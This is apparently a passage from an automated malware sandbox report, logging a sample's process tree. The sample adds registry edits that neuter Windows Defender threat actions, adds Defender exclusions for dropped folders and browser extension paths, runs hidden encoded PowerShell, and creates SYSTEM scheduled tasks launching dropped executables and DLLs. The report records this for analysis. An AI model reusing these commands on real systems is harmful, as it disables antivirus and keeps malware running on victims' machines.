C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4192
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:323⤵PID:5624
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:324⤵PID:4008
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:643⤵PID:1120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:323⤵PID:2832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:643⤵PID:2388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:323⤵PID:5596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:643⤵PID:2576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:323⤵PID:5220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:643⤵PID:5864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:323⤵PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:643⤵PID:3000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:323⤵PID:3840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:643⤵PID:5876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:323⤵PID:6088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:643⤵PID:3312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:323⤵PID:696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:643⤵PID:1748
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOiGpzPfM" /SC once /ST 14:53:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:2472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOiGpzPfM"2⤵PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOiGpzPfM"2⤵PID:2800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 06:18:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\DlrnvPY.exe\" Wy /bJqXdidgE 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FPIEUdZLMYPzsiUNM"2⤵PID:3856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 6522⤵
- Program crash
PID:5696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1592
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5144
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5916
-
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\DlrnvPY.exeC:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\DlrnvPY.exe Wy /bJqXdidgE 757674 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5200 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"2⤵PID:5128
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:3840
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:4052
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1848
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\RGDzRw.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\qAmzzaV.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OcPshDNvhDnVmSv"2⤵PID:2220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OcPshDNvhDnVmSv"2⤵PID:3168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\UniKJqx.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:32
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\sphbpgC.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:6060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\PFUpSQi.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\HnXYHKd.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 17:49:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\QBGdMxfA\njHglJk.dll\",#1 /gCwdidSsIC 757674" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MRTHivZIQsRdEanwm"2⤵PID:1468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "Bogpd1" /SC once /ST 16:21:04 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "Bogpd1"2⤵PID:2776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "Bogpd1"2⤵PID:5252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"2⤵PID:4760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 23642⤵
- Program crash
PID:4056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1720 -ip 17201⤵PID:1120
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\QBGdMxfA\njHglJk.dll",#1 /gCwdidSsIC 7576741⤵PID:4476
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\QBGdMxfA\njHglJk.dll",#1 /gCwdidSsIC 7576742⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5876 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"3⤵PID:1964
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1928 -ip 19281⤵PID:2420
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5944 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa7edb3cb8,0x7ffa7edb3cc8,0x7ffa7edb3cd82⤵PID:804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2076 /prefetch:22⤵PID:1984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:32⤵PID:1368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:82⤵PID:2520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵PID:3948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵PID:1920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:12⤵PID:3024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4440 /prefetch:12⤵PID:1420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:12⤵PID:32
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:82⤵PID:4088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:12⤵PID:3580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,11755025348738165846,9056326601940252092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:12⤵PID:3840
-
-
